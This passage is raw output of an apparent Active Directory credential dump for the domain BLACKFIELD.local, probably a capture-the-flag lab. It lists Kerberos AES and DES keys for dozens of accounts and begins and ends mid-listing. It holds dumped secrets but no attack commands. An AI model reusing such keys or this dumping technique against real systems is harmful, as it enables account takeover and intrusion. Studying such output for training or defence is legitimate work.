            BLACKFIELD.local\BLACKFIELD497216:des-cbc-md5:01730e8a6d45ea5b
            BLACKFIELD.local\BLACKFIELD839613:aes256-cts-hmac-sha1-96:760af1276bb55c348ef8b96c1c906361ebdf7a9ced6bfaaedc5e090afd1e3191
            BLACKFIELD.local\BLACKFIELD839613:aes128-cts-hmac-sha1-96:0ce6e42e4ee9b5576c3ac4e8df842e11
            BLACKFIELD.local\BLACKFIELD839613:des-cbc-md5:3dcb611c91c8e5f2
            BLACKFIELD.local\BLACKFIELD428532:aes256-cts-hmac-sha1-96:cf5315f76d1ed768c0374950fa49afc605fcf1aed2215b97aaa1c1e0b54764a6
            BLACKFIELD.local\BLACKFIELD428532:aes128-cts-hmac-sha1-96:2e2e78f29cf5852c56a0713318f90925
            BLACKFIELD.local\BLACKFIELD428532:des-cbc-md5:b3a8e9ba91f4455e
            BLACKFIELD.local\BLACKFIELD697473:aes256-cts-hmac-sha1-96:ad38592c7a3e146dd835dcfdd1eccb8407ed87bf37b7894bc0493939c769fbb2
            BLACKFIELD.local\BLACKFIELD697473:aes128-cts-hmac-sha1-96:d391cfad105367168e4e8ba35e41eef8
            BLACKFIELD.local\BLACKFIELD697473:des-cbc-md5:d33d31d64fa19719
            BLACKFIELD.local\BLACKFIELD291678:aes256-cts-hmac-sha1-96:06c3f0b50becceaae1f70bc13480a2d91ff41b73ace75d9535b6d76ee7635d21
            BLACKFIELD.local\BLACKFIELD291678:aes128-cts-hmac-sha1-96:cef5198211bb99414c825088efb17704
            BLACKFIELD.local\BLACKFIELD291678:des-cbc-md5:e53dda4a320e6dcd
            BLACKFIELD.local\BLACKFIELD623122:aes256-cts-hmac-sha1-96:3df98daaddf7852aa66bd995d3c91ce2a0137cffe812b64f9295e9692a05cb85
            BLACKFIELD.local\BLACKFIELD623122:aes128-cts-hmac-sha1-96:74f0b60e52c28531847c58904d345b51
            BLACKFIELD.local\BLACKFIELD623122:des-cbc-md5:7558ef1a13f876a7
            BLACKFIELD.local\BLACKFIELD765982:aes256-cts-hmac-sha1-96:dc5630f960d3cd368ed981a9ef3a70a8d4eed0a5838050d59e79043a02dc91ba
            BLACKFIELD.local\BLACKFIELD765982:aes128-cts-hmac-sha1-96:47562f476d480923dc2a1f72fc0e7fdb
            BLACKFIELD.local\BLACKFIELD765982:des-cbc-md5:453bf4070d02928f
            BLACKFIELD.local\BLACKFIELD701303:aes256-cts-hmac-sha1-96:1d3e45ccb96b8b9619f1254fc8cedf48a4ef813128d99f87f9dadc0a07a9cdd7
            BLACKFIELD.local\BLACKFIELD701303:aes128-cts-hmac-sha1-96:415ec732adb3eda94e6086a6bdfcb0ca
            BLACKFIELD.local\BLACKFIELD701303:des-cbc-md5:b9ec61b07afea810
            BLACKFIELD.local\BLACKFIELD250576:aes256-cts-hmac-sha1-96:9980e04dd383f1e601a8599bd0581789fcf2f97ff937b6af7dd137a44e9b36be
            BLACKFIELD.local\BLACKFIELD250576:aes128-cts-hmac-sha1-96:5b5680ff665733f571f6a3b369b3f77d
            BLACKFIELD.local\BLACKFIELD250576:des-cbc-md5:15d358d0511fb36e
            BLACKFIELD.local\BLACKFIELD971417:aes256-cts-hmac-sha1-96:15aeb850b37e862d59bf04f3c5e0f7f5dc80082a50b1032cd6458d2d29190bf6
            BLACKFIELD.local\BLACKFIELD971417:aes128-cts-hmac-sha1-96:01db5f7ea9e847ec88193c22e009f9c5
            BLACKFIELD.local\BLACKFIELD971417:des-cbc-md5:8c6dce1c49a7626e
            BLACKFIELD.local\BLACKFIELD160820:aes256-cts-hmac-sha1-96:0a4f9f8a2ecebbef4620591b50d208993212d270d06218d562b07d96debe0220
            BLACKFIELD.local\BLACKFIELD160820:aes128-cts-hmac-sha1-96:9eb93b5351c49f5bed1bc75b23333b54
            BLACKFIELD.local\BLACKFIELD160820:des-cbc-md5:bc853b915ef126ec
            BLACKFIELD.local\BLACKFIELD385928:aes256-cts-hmac-sha1-96:1211c8954c27e31780535061799f00cdc0cdaf855893ba2b108e422cddb466a7
            BLACKFIELD.local\BLACKFIELD385928:aes128-cts-hmac-sha1-96:9ee29475b650ea3821c63e5ea5c2997d
            BLACKFIELD.local\BLACKFIELD385928:des-cbc-md5:401029a113c1b3cd
            BLACKFIELD.local\BLACKFIELD848660:aes256-cts-hmac-sha1-96:aeaa2ef43116d269045c725148a8346aa0acb04827c66b4ec3fdb0b8c298725f
            BLACKFIELD.local\BLACKFIELD848660:aes128-cts-hmac-sha1-96:cc137e1dc689f1c7a2729d36281408bd
            BLACKFIELD.local\BLACKFIELD848660:des-cbc-md5:896e9d209d8f70da
            BLACKFIELD.local\BLACKFIELD682842:aes256-cts-hmac-sha1-96:ff18cfab4f21201d30db0b2dd86e667bf4f6afa3cefedae5d863bf64a6d3c36c
            BLACKFIELD.local\BLACKFIELD682842:aes128-cts-hmac-sha1-96:61eb00e7de8bd788848c4fdb4fd361ac
            BLACKFIELD.local\BLACKFIELD682842:des-cbc-md5:6d5210ecc20e9ee6
            BLACKFIELD.local\BLACKFIELD813266:aes256-cts-hmac-sha1-96:ef5d59fb4c36a693ec52acd9bf4532feb32cccceac64f15f7efef56d9bac3f9d
            BLACKFIELD.local\BLACKFIELD813266:aes128-cts-hmac-sha1-96:749903221dd9b3fa35ef15451abef0d4
            BLACKFIELD.local\BLACKFIELD813266:des-cbc-md5:fe64b0d9d3f4a8ea
            BLACKFIELD.local\BLACKFIELD274577:aes256-cts-hmac-sha1-96:fd69c09d51efe7c71083fd34a8b8c525ede047ec862ab7d835bc3b97a06d88ae
            BLACKFIELD.local\BLACKFIELD274577:aes128-cts-hmac-sha1-96:17a785440bb3c22e8610e9a013c89167
            BLACKFIELD.local\BLACKFIELD274577:des-cbc-md5:0eef4937ce5b5426
            BLACKFIELD.local\BLACKFIELD448641:aes256-cts-hmac-sha1-96:300b1165d516d6d889f60fa24c1b0cc4a3dd6a41a5b0ea5e5de85eeb130546d5
            BLACKFIELD.local\BLACKFIELD448641:aes128-cts-hmac-sha1-96:c9db54348c662547b564b750676c4601
            BLACKFIELD.local\BLACKFIELD448641:des-cbc-md5:7a6b89292a62795b
            BLACKFIELD.local\BLACKFIELD318077:aes256-cts-hmac-sha1-96:adb49e8c307eefa95b1fc8d3d65f20d28768c6a8017088fe86fc88d52c392ca1
            BLACKFIELD.local\BLACKFIELD318077:aes128-cts-hmac-sha1-96:3ea7ac872f03e8d63707bffccb4d6672
            BLACKFIELD.local\BLACKFIELD318077:des-cbc-md5:23cb6dbff4a86116
            BLACKFIELD.local\BLACKFIELD289513:aes256-cts-hmac-sha1-96:396214e8bd7babcf9e9624e3d4fdfce9d643094dce68ec3dde5ab1b270be9701
            BLACKFIELD.local\BLACKFIELD289513:aes128-cts-hmac-sha1-96:79626ca89298880cb9574fc2c7483169
            BLACKFIELD.local\BLACKFIELD289513:des-cbc-md5:62b6238f5dea0d79
            BLACKFIELD.local\BLACKFIELD336573:aes256-cts-hmac-sha1-96:2c2ca5aa75b872667f60a957040ae56bebda6cd02e4d7d1d3e0d6b17e97f1530
            BLACKFIELD.local\BLACKFIELD336573:aes128-cts-hmac-sha1-96:1e1a00c817f89bc5385e22088fda5a06
            BLACKFIELD.local\BLACKFIELD336573:des-cbc-md5:76cd2aa4c8b55ba8
            BLACKFIELD.local\BLACKFIELD962495:aes256-cts-hmac-sha1-96:6451984e20e67d9d9770a0fb656b2834cbb8bd46918115fcd1731e10c9b83c9b
            BLACKFIELD.local\BLACKFIELD962495:aes128-cts-hmac-sha1-96:a0a12ed255897d71c129a4c68f755431
            BLACKFIELD.local\BLACKFIELD962495:des-cbc-md5:04830252d32cf404
            BLACKFIELD.local\BLACKFIELD566117:aes256-cts-hmac-sha1-96:8fe73c9719003cbcd14acaa36472f21be47ea231e0c77bfcee3ccb742d110ccb
            BLACKFIELD.local\BLACKFIELD566117:aes128-cts-hmac-sha1-96:50f44c1ed5ca044cc57da621df0ca84b
            BLACKFIELD.local\BLACKFIELD566117:des-cbc-md5:ab0e6864d3d591c8
            BLACKFIELD.local\BLACKFIELD617630:aes256-cts-hmac-sha1-96:e5e9d745b8792a2736484ba53cb9c9fa5f3947c53cf3dad66bf6f75521d0df59
            BLACKFIELD.local\BLACKFIELD617630:aes128-cts-hmac-sha1-96:f40f2a3f486aed1623fda71175c1a1fa
            BLACKFIELD.local\BLACKFIELD617630:des-cbc-md5:e32a86106d897313
            BLACKFIELD.local\BLACKFIELD717683:aes256-cts-hmac-sha1-96:3fd83a2720d7a43dce127546f36b5fa1e078f985126b1301b629642f0988f71b
            BLACKFIELD.local\BLACKFIELD717683:aes128-cts-hmac-sha1-96:742e544f0d3fc9f7ea8d8b9cd9228ed9
            BLACKFIELD.local\BLACKFIELD717683:des-cbc-md5:ba0870e0462a7683
            BLACKFIELD.local\BLACKFIELD390192:aes256-cts-hmac-sha1-96:61f59ea89475cf0bf379f6bcd10f6ba645d6d1497315dbe893c2180136602b0d
            BLACKFIELD.local\BLACKFIELD390192:aes128-cts-hmac-sha1-96:1999c8739cbc3cfdc84d01b0abae5054
            BLACKFIELD.local\BLACKFIELD390192:des-cbc-md5:26a8eab51a1c3473
            BLACKFIELD.local\BLACKFIELD652779:aes256-cts-hmac-sha1-96:95e296b01346ff9adc53d3c51ad395cec288fe609a8339c7ca4835467ebf38c4
            BLACKFIELD.local\BLACKFIELD652779:aes128-cts-hmac-sha1-96:b3f0336cf467baf651f9a363c6cfd575
            BLACKFIELD.local\BLACKFIELD652779:des-cbc-md5:9b451f1f07ba5b20
            BLACKFIELD.local\BLACKFIELD665997:aes256-cts-hmac-sha1-96:8ef4ddde4e284c6bf36337c8088408d29c3efdb3e25d3ffeb9c846262057c1cf
            BLACKFIELD.local\BLACKFIELD665997:aes128-cts-hmac-sha1-96:36554baa5c17b645e49d8884117171d6
            BLACKFIELD.local\BLACKFIELD665997:des-cbc-md5:19f43b0df11a2915
            BLACKFIELD.local\BLACKFIELD998321:aes256-cts-hmac-sha1-96:205d693325172dd0cdf63e97d918ee8be8548def2ca83ca34a2d2d4f5b5c1ffc
            BLACKFIELD.local\BLACKFIELD998321:aes128-cts-hmac-sha1-96:f48ce2a0918a4ac91005c9bc5b14d8b1
            BLACKFIELD.local\BLACKFIELD998321:des-cbc-md5:ef19d3f192523e34
            BLACKFIELD.local\BLACKFIELD946509:aes256-cts-hmac-sha1-96:b937776a077522a8bdb8f3ef8176ea3532c3a45d662d05d1391e3faa916d18c2
            BLACKFIELD.local\BLACKFIELD946509:aes128-cts-hmac-sha1-96:80240e47712c2008515a2cc0f2d25afc
            BLACKFIELD.local\BLACKFIELD946509:des-cbc-md5:b02f1079a861aecd
            BLACKFIELD.local\BLACKFIELD228442:aes256-cts-hmac-sha1-96:6c71a84236b9ed3218bb00d143a8b19bc6e5f6a861649927a5155ea3a1c4c3e1
            BLACKFIELD.local\BLACKFIELD228442:aes128-cts-hmac-sha1-96:01d125c5a99158d4c126b9cf7eb09f7a
            BLACKFIELD.local\BLACKFIELD228442:des-cbc-md5:6137cbe394c2a2cd
            BLACKFIELD.local\BLACKFIELD548464:aes256-cts-hmac-sha1-96:b70246cd9d03813f24f98caec3aa2d71e7733a1922b68754838eb6387cdc6186
            BLACKFIELD.local\BLACKFIELD548464:aes128-cts-hmac-sha1-96:c882c79b7abb1943dd0dfe2d28197e9f
            BLACKFIELD.local\BLACKFIELD548464:des-cbc-md5:8c259708d56783df
            BLACKFIELD.local\BLACKFIELD586592:aes256-cts-hmac-sha1-96:df7c95ec6468f9adb1c2b527be40ebd5b2e0c53ec13f045f18e2de03437d935c
            BLACKFIELD.local\BLACKFIELD586592:aes128-cts-hmac-sha1-96:18315b5e53e53fc570913ba66271ed6c
            BLACKFIELD.local\BLACKFIELD586592:des-cbc-md5:6b3473547cbc3b9e
            BLACKFIELD.local\BLACKFIELD512331:aes256-cts-hmac-sha1-96:a291ce9c06f0c017f4bdadcc4a518b7de901152af174469093ce3bd05525ce26
            BLACKFIELD.local\BLACKFIELD512331:aes128-cts-hmac-sha1-96:7d342af087fe1f67190e04a9fd64b5d3
            BLACKFIELD.local\BLACKFIELD512331:des-cbc-md5:df9b3416f17c37f4
            BLACKFIELD.local\BLACKFIELD609423:aes256-cts-hmac-sha1-96:24a4da44018e26745a85ac3099ba85c12b227e6b62ffc1ea8a68b73c6ba1d331
            BLACKFIELD.local\BLACKFIELD609423:aes128-cts-hmac-sha1-96:1c50b84259e279915af1d4876eb7faf7
            BLACKFIELD.local\BLACKFIELD609423:des-cbc-md5:52df40ce8f92f252
            BLACKFIELD.local\BLACKFIELD395725:aes256-cts-hmac-sha1-96:218d92c0df6caa17c9aa7b847c8ea47f8f920691cb018cc1570a2ed62d6443d6
            BLACKFIELD.local\BLACKFIELD395725:aes128-cts-hmac-sha1-96:1ef237fb7e85fc17a7f4267ce8d77b5f
            BLACKFIELD.local\BLACKFIELD395725:des-cbc-md5:6e0df7892a982331
            BLACKFIELD.local\BLACKFIELD438923:aes256-cts-hmac-sha1-96:5f952958ece7d270273122d9309eb45a04f52061d65b5ff9002b50c340fad7c1
            BLACKFIELD.local\BLACKFIELD438923:aes128-cts-hmac-sha1-96:a2eb7d16274a2ccc46cf622582dc2f18
            BLACKFIELD.local\BLACKFIELD438923:des-cbc-md5:7aea85379b982308
            BLACKFIELD.local\BLACKFIELD691480:aes256-cts-hmac-sha1-96:1012a42943ebad56fcc8764e18262066a21dce803e7231a0c633ac8ee5c2c258
            BLACKFIELD.local\BLACKFIELD691480:aes128-cts-hmac-sha1-96:fc6288a12263b729b900b2fba477cddf
            BLACKFIELD.local\BLACKFIELD691480:des-cbc-md5:197380520ea7260d
            BLACKFIELD.local\BLACKFIELD236467:aes256-cts-hmac-sha1-96:53b52d04dd5b2666624e98073fa4bee23f84beace576fd985204f73565bba400
            BLACKFIELD.local\BLACKFIELD236467:aes128-cts-hmac-sha1-96:0bb7670c3acace82cb8c54991b8f5b30
            BLACKFIELD.local\BLACKFIELD236467:des-cbc-md5:b3e58f29525bd6df
            BLACKFIELD.local\BLACKFIELD895235:aes256-cts-hmac-sha1-96:47034e6e4e0bdd08c0f3fa81743d9ddc800595e77d7381e95da87e880a58a617
            BLACKFIELD.local\BLACKFIELD895235:aes128-cts-hmac-sha1-96:c55b8ccae8dd6a6ca71f5cb63a855960
            BLACKFIELD.local\BLACKFIELD895235:des-cbc-md5:2a7cae57ce105b45
            BLACKFIELD.local\BLACKFIELD788523:aes256-cts-hmac-sha1-96:03011fe2f056e4c315964d5c30abf4f58cabbae3a7b9d4b16633564b4ed5e667
            BLACKFIELD.local\BLACKFIELD788523:aes128-cts-hmac-sha1-96:8659c1e30d0b7b3db1c695450b9f9857
            BLACKFIELD.local\BLACKFIELD788523:des-cbc-md5:a7c2b9a75b2c8f64
            BLACKFIELD.local\BLACKFIELD710285:aes256-cts-hmac-sha1-96:5e866960daefebce77eda597f9d1d6cb949188372d796599560b83623ee1896d
            BLACKFIELD.local\BLACKFIELD710285:aes128-cts-hmac-sha1-96:5974d0eb5eadca883d742559b3dc10b3
            BLACKFIELD.local\BLACKFIELD710285:des-cbc-md5:c77931c7cb613813
            BLACKFIELD.local\BLACKFIELD357023:aes256-cts-hmac-sha1-96:882c6529f630ef9a89bda57ddbacd06b4ae7b5a3061c25b29f1dd7df43580237
            BLACKFIELD.local\BLACKFIELD357023:aes128-cts-hmac-sha1-96:545bd08008df81943c2b8fe3b020605c
            BLACKFIELD.local\BLACKFIELD357023:des-cbc-md5:251c2a26858673ef
            BLACKFIELD.local\BLACKFIELD362337:aes256-cts-hmac-sha1-96:81ace337dbf0310563bbedaa37c00ca41b3a6ed3592b58f9a26c2a6adaac6e66
            BLACKFIELD.local\BLACKFIELD362337:aes128-cts-hmac-sha1-96:ede6855c4e9271fe5f20dab0eadcec87
            BLACKFIELD.local\BLACKFIELD362337:des-cbc-md5:f26232fe830e9407
            BLACKFIELD.local\BLACKFIELD651599:aes256-cts-hmac-sha1-96:ddf8469ec7b9f1fb119cc29ffa022c446035dba9a4a79fecdf389ac1300e0ef7
            BLACKFIELD.local\BLACKFIELD651599:aes128-cts-hmac-sha1-96:58f3671e626e7a68210585ecc1f48846
            BLACKFIELD.local\BLACKFIELD651599:des-cbc-md5:97679b1a986bbf9b
            BLACKFIELD.local\BLACKFIELD579344:aes256-cts-hmac-sha1-96:76bf01bc3505b0752e45a317fcbff5b230d76929054021197805828e452fef52
            BLACKFIELD.local\BLACKFIELD579344:aes128-cts-hmac-sha1-96:341612cbe88894c30fc2de0c3098c5e5
            BLACKFIELD.local\BLACKFIELD579344:des-cbc-md5:eabad3f1293e8c8f
            BLACKFIELD.local\BLACKFIELD859776:aes256-cts-hmac-sha1-96:56f35fe2cb07b21ff55c02d9c3e53eeada4415a2d60c340e82b1d31182b38647
            BLACKFIELD.local\BLACKFIELD859776:aes128-cts-hmac-sha1-96:fd60e57da6e0c1f3dd9e311588f3c882
            BLACKFIELD.local\BLACKFIELD859776:des-cbc-md5:86a44034a2c77af4
            BLACKFIELD.local\BLACKFIELD789969:aes256-cts-hmac-sha1-96:3e2776b2936d3aa669644205ab5419c2ed23251750eeb15fbd2ba1d83f0e6470
            BLACKFIELD.local\BLACKFIELD789969:aes128-cts-hmac-sha1-96:7240e50f2effb4de244603e63d63514b
            BLACKFIELD.local\BLACKFIELD789969:des-cbc-md5:75a4d00b0b9d9b54
            BLACKFIELD.local\BLACKFIELD356727:aes256-cts-hmac-sha1-96:14494eec5e6bc224cb76228a19f58c880afe6dbb3cf14a303f5ca78dfdac30c9
            BLACKFIELD.local\BLACKFIELD356727:aes128-cts-hmac-sha1-96:6d58cf3090d9fcdab75228fe54149ec3
            BLACKFIELD.local\BLACKFIELD356727:des-cbc-md5:c24c577637548a68
            BLACKFIELD.local\BLACKFIELD962999:aes256-cts-hmac-sha1-96:ace4fc1a3bb2091c7544dc8f07a4bac363f5d8d52bffc9d364791436b4c3307c
            BLACKFIELD.local\BLACKFIELD962999:aes128-cts-hmac-sha1-96:8e73c6b70251a24b3a6229e237983e6c
            BLACKFIELD.local\BLACKFIELD962999:des-cbc-md5:46cd92516df8e6b9
            BLACKFIELD.local\BLACKFIELD201655:aes256-cts-hmac-sha1-96:92c309ca911e2b15489dd9881d02cc6bf3994b068e4a39b16d86351708a767c7
            BLACKFIELD.local\BLACKFIELD201655:aes128-cts-hmac-sha1-96:a553a29ff6be052ed3516863684053de
            BLACKFIELD.local\BLACKFIELD201655:des-cbc-md5:cb83e620a4b33104
            BLACKFIELD.local\BLACKFIELD635996:aes256-cts-hmac-sha1-96:40d2ef896a7fc85d4fc07635e98a26c4af3e6a1f021232f8017dfe25f3da097f
            BLACKFIELD.local\BLACKFIELD635996:aes128-cts-hmac-sha1-96:b0644e6e418d940036b0ce16555817f5
            BLACKFIELD.local\BLACKFIELD635996:des-cbc-md5:4f164afbae8a9416
            BLACKFIELD.local\BLACKFIELD478410:aes256-cts-hmac-sha1-96:ea426854e8b7eef6bb460652153a2b36ebe857c55743ff8590671699e710d755
            BLACKFIELD.local\BLACKFIELD478410:aes128-cts-hmac-sha1-96:fecf1b157c61cc123550fdfdf2efc208
            BLACKFIELD.local\BLACKFIELD478410:des-cbc-md5:c7ce0eead68ab97f
            BLACKFIELD.local\BLACKFIELD518316:aes256-cts-hmac-sha1-96:26d27e3401b811dcd45638439d86fa020677f6128bdde82c1887ebc9113814a1
            BLACKFIELD.local\BLACKFIELD518316:aes128-cts-hmac-sha1-96:e20a03fd31eef60b8240a5bf56bf7f3f
            BLACKFIELD.local\BLACKFIELD518316:des-cbc-md5:9b32499194e5318a
            BLACKFIELD.local\BLACKFIELD202900:aes256-cts-hmac-sha1-96:a94579edf37af93843a4b1914aa3328551e270ece22825a5bc729bed12dce9d8
            BLACKFIELD.local\BLACKFIELD202900:aes128-cts-hmac-sha1-96:431c10d4f1bf6f74287ec2e59c59a22f
            BLACKFIELD.local\BLACKFIELD202900:des-cbc-md5:cb465efea23b5858
            BLACKFIELD.local\BLACKFIELD767498:aes256-cts-hmac-sha1-96:b9b2b67c763facc1ec8187e4ff9cf0d88c8cc98acade7c14dc313d4c5105a259
            BLACKFIELD.local\BLACKFIELD767498:aes128-cts-hmac-sha1-96:9c7e992aeef9956ec3eb00826f5e8542
            BLACKFIELD.local\BLACKFIELD767498:des-cbc-md5:f825977c9e83bcf7
            BLACKFIELD.local\BLACKFIELD103974:aes256-cts-hmac-sha1-96:6ca96bd16498dbab706fd6c8f9014dd6fd43db24a119f279bb6b431fd35c7f6a
            BLACKFIELD.local\BLACKFIELD103974:aes128-cts-hmac-sha1-96:efc116fd6a946c762698f6c084642806
            BLACKFIELD.local\BLACKFIELD103974:des-cbc-md5:98e025105d2a6de9
            BLACKFIELD.local\BLACKFIELD135403:aes256-cts-hmac-sha1-96:f79c1f76068f32a5cb57a91f484932c68514e4ee694e2fac12550f88487dfdcb
            BLACKFIELD.local\BLACKFIELD135403:aes128-cts-hmac-sha1-96:81b87f5fb5afc07724d1f6f41acfe23e
            BLACKFIELD.local\BLACKFIELD135403:des-cbc-md5:e0bf6bfe40f8e09b
            BLACKFIELD.local\BLACKFIELD112766:aes256-cts-hmac-sha1-96:4694a11c1ce868eca08ce87e3fa8407b7fb2b7bf6c86976504fbeb9ebe0a3bbb
            BLACKFIELD.local\BLACKFIELD112766:aes128-cts-hmac-sha1-96:69dc32de7c35ba3eb3af291f0fd10f4b
            BLACKFIELD.local\BLACKFIELD112766:des-cbc-md5:b99db6bab01a450e
            BLACKFIELD.local\BLACKFIELD978938:aes256-cts-hmac-sha1-96:255492ac40a42a371a5b3920d6b07dce47621afac6514ae6fc2549d2e8be8944
            BLACKFIELD.local\BLACKFIELD978938:aes128-cts-hmac-sha1-96:e17103d1078fd05fb1b63e91da6f30da
            BLACKFIELD.local\BLACKFIELD978938:des-cbc-md5:c2c18334c7a70175
            BLACKFIELD.local\BLACKFIELD871753:aes256-cts-hmac-sha1-96:f5a882111ce083f783a5a0d1a2e6d28fbb683365ae89ddcf00f2eb5c8dd084b4
            BLACKFIELD.local\BLACKFIELD871753:aes128-cts-hmac-sha1-96:525444504a0feb49a63fc6a196790ceb
            BLACKFIELD.local\BLACKFIELD871753:des-cbc-md5:6dce7ff8c28f85c1
            BLACKFIELD.local\BLACKFIELD136203:aes256-cts-hmac-sha1-96:f05a506c2274e44aafff2ee69b0585a4b14e5230b24174751e5f32f3cfae7874
            BLACKFIELD.local\BLACKFIELD136203:aes128-cts-hmac-sha1-96:009009390bf4165dac599f184fd08be5
            BLACKFIELD.local\BLACKFIELD136203:des-cbc-md5:b5988cc457265bea
            BLACKFIELD.local\BLACKFIELD634593:aes256-cts-hmac-sha1-96:31cd6f560528fd88e2a812510ee0b27665efd88dd2e766ab8f4848b2407f6d00
            BLACKFIELD.local\BLACKFIELD634593:aes128-cts-hmac-sha1-96:ef1d3eb1d0ce8cf858e4fcc019d4b3c7
            BLACKFIELD.local\BLACKFIELD634593:des-cbc-md5:57349476e308fd6d
            BLACKFIELD.local\BLACKFIELD274367:aes256-cts-hmac-sha1-96:a2954d27da461a42512ea662b4beeef14b76fa628059fdcca92282ecda916ba9
            BLACKFIELD.local\BLACKFIELD274367:aes128-cts-hmac-sha1-96:95b6e6ef02fb146f1d47fd09f23ddff8
            BLACKFIELD.local\BLACKFIELD274367:des-cbc-md5:bc62a2e0b31fdf7a
            BLACKFIELD.local\BLACKFIELD520852:aes256-cts-hmac-sha1-96:2e71c339d0fa5da3762ae24b794a91d646faefac8a8327f90e5bfa7c67df87ee
            BLACKFIELD.local\BLACKFIELD520852:aes128-cts-hmac-sha1-96:c2e64f2f9c4cc927926b56831dcaf5d7
            BLACKFIELD.local\BLACKFIELD520852:des-cbc-md5:9e4c294f94511cdc
            BLACKFIELD.local\BLACKFIELD339143:aes256-cts-hmac-sha1-96:8d3c1ea58f248627c79da7324e34bc86e4b81942d79c526827ddbb61a83ab5d1
            BLACKFIELD.local\BLACKFIELD339143:aes128-cts-hmac-sha1-96:00936b98bec25462eac19fdd1f131d9f
            BLACKFIELD.local\BLACKFIELD339143:des-cbc-md5:c19198940201a4e6
            BLACKFIELD.local\BLACKFIELD684814:aes256-cts-hmac-sha1-96:9ba30c70c9f7d7276477fdde42d21c94427f93e0aae6893c6a5f76cbee876ccb
            BLACKFIELD.local\BLACKFIELD684814:aes128-cts-hmac-sha1-96:df9ef8d31ec3bbc3ede73bab1aa107e6
            BLACKFIELD.local\BLACKFIELD684814:des-cbc-md5:61d352527c109134
            BLACKFIELD.local\BLACKFIELD792484:aes256-cts-hmac-sha1-96:a85f1e57196c7561e3a84b317e39b7022934bc7a901baa3196b43fcf05cff38e
            BLACKFIELD.local\BLACKFIELD792484:aes128-cts-hmac-sha1-96:4bb9e93d5048e30ff507016df8fda04e
            BLACKFIELD.local\BLACKFIELD792484:des-cbc-md5:51f1bad3e9dc20e0
            BLACKFIELD.local\BLACKFIELD802875:aes256-cts-hmac-sha1-96:25391d01b024d79d9bb3b2543c667802a505036177bd8b5841e6fcca55558336
            BLACKFIELD.local\BLACKFIELD802875:aes128-cts-hmac-sha1-96:ce13f97a23d5946e3f1285e2b769c70a
            BLACKFIELD.local\BLACKFIELD802875:des-cbc-md5:510d5292f1d03d19
            BLACKFIELD.local\BLACKFIELD383108:aes256-cts-hmac-sha1-96:302910d2220f0db1ee54f41a42e195a4651c612fc91163563f8e4fef1709bfd4
            BLACKFIELD.local\BLACKFIELD383108:aes128-cts-hmac-sha1-96:6478f61b5332856d051e2e5939ba82bb
            BLACKFIELD.local\BLACKFIELD383108:des-cbc-md5:46f7e50b1a8a3168
            BLACKFIELD.local\BLACKFIELD318250:aes256-cts-hmac-sha1-96:f8e86cfa43bebe3611ff48e5b4e65a6aacc4ce7feab53c8522ea34d3efe7e28b
            BLACKFIELD.local\BLACKFIELD318250:aes128-cts-hmac-sha1-96:ae7db731ab7d6c945925e98c0166935b
            BLACKFIELD.local\BLACKFIELD318250:des-cbc-md5:681c19f257dac46e
            BLACKFIELD.local\BLACKFIELD496547:aes256-cts-hmac-sha1-96:1c325dcea623b3599debfafc0ae7a3a71ab33ed5858de018cfa2567cbb65a13c
            BLACKFIELD.local\BLACKFIELD496547:aes128-cts-hmac-sha1-96:aa118e74b938d81321f7c6513b569ea8
            BLACKFIELD.local\BLACKFIELD496547:des-cbc-md5:973ec2383ee086dc
            BLACKFIELD.local\BLACKFIELD219914:aes256-cts-hmac-sha1-96:99137fd93fe993a22ec93601cf137b92893c9a8a30feabb147fb325f1bce596b
            BLACKFIELD.local\BLACKFIELD219914:aes128-cts-hmac-sha1-96:568d9a9a7098792e026cd74ff5a5be89
            BLACKFIELD.local\BLACKFIELD219914:des-cbc-md5:58268fcd6d9123ce
            BLACKFIELD.local\BLACKFIELD454313:aes256-cts-hmac-sha1-96:43d9de7306a3e1cc6b43e80e54a8b3e6ffe822fabc284244e34297792fdcf7ee
            BLACKFIELD.local\BLACKFIELD454313:aes128-cts-hmac-sha1-96:c23cc4b3eabd374a9c94f28001d6447d
            BLACKFIELD.local\BLACKFIELD454313:des-cbc-md5:e3b5c24345b61043
            BLACKFIELD.local\BLACKFIELD460131:aes256-cts-hmac-sha1-96:c715d4d0b07618b7136ff5b7fc2b00f03a8fb69c412e1b384ea72a04789f056c
            BLACKFIELD.local\BLACKFIELD460131:aes128-cts-hmac-sha1-96:a01dc8f9188f4c8fd5ecf21babc1f4fb
            BLACKFIELD.local\BLACKFIELD460131:des-cbc-md5:5b5151a44632ab13
            BLACKFIELD.local\BLACKFIELD613771:aes256-cts-hmac-sha1-96:29c448250caea51cd2585706fc75899bc4b3fc1846993fac99a556cdf90b1f50
            BLACKFIELD.local\BLACKFIELD613771:aes128-cts-hmac-sha1-96:7f1b5743b5a2771383361a582d39afbf
            BLACKFIELD.local\BLACKFIELD613771:des-cbc-md5:34071689a10d25c8
            BLACKFIELD.local\BLACKFIELD632329:aes256-cts-hmac-sha1-96:763c0dc9ed9efb365083bff3301a4322c0efaf629f2916fe4a83e23394ffedac
            BLACKFIELD.local\BLACKFIELD632329:aes128-cts-hmac-sha1-96:dca8ba9a3053afa363614ce57b823668
            BLACKFIELD.local\BLACKFIELD632329:des-cbc-md5:b66223dfb5541fbc
            BLACKFIELD.local\BLACKFIELD402639:aes256-cts-hmac-sha1-96:abc58938b0d30cb6fcf305384e8b9e68ee8a8b6cfcbe0c362dbd09d18113f941
            BLACKFIELD.local\BLACKFIELD402639:aes128-cts-hmac-sha1-96:c3a6cf841f27b5ba8078b8399a194498
            BLACKFIELD.local\BLACKFIELD402639:des-cbc-md5:c738d96b1fdce685
            BLACKFIELD.local\BLACKFIELD235930:aes256-cts-hmac-sha1-96:3d164ec0ec726bd637e4a88ff25102f85ca40b656d1de660b032100c383b76f0
            BLACKFIELD.local\BLACKFIELD235930:aes128-cts-hmac-sha1-96:33406fa9a6cad02d6514e12e1dd6f6c5
            BLACKFIELD.local\BLACKFIELD235930:des-cbc-md5:8f04b9cbd92cdc3e
            BLACKFIELD.local\BLACKFIELD246388:aes256-cts-hmac-sha1-96:c1a7557ff85bccc7774d77839ba856229a617644deae8a61d95491b39573e765
            BLACKFIELD.local\BLACKFIELD246388:aes128-cts-hmac-sha1-96:bdd83a55f16637d33dcad04d2a561901
            BLACKFIELD.local\BLACKFIELD246388:des-cbc-md5:2c61da917620f14c
            BLACKFIELD.local\BLACKFIELD946435:aes256-cts-hmac-sha1-96:cb85a9aa7ab8e1e0256a2059107ad3a6596ff42776976bc8e2a5046b04b4e5e3
            BLACKFIELD.local\BLACKFIELD946435:aes128-cts-hmac-sha1-96:ed38268cc39f0f01afbfb8b0edd65142
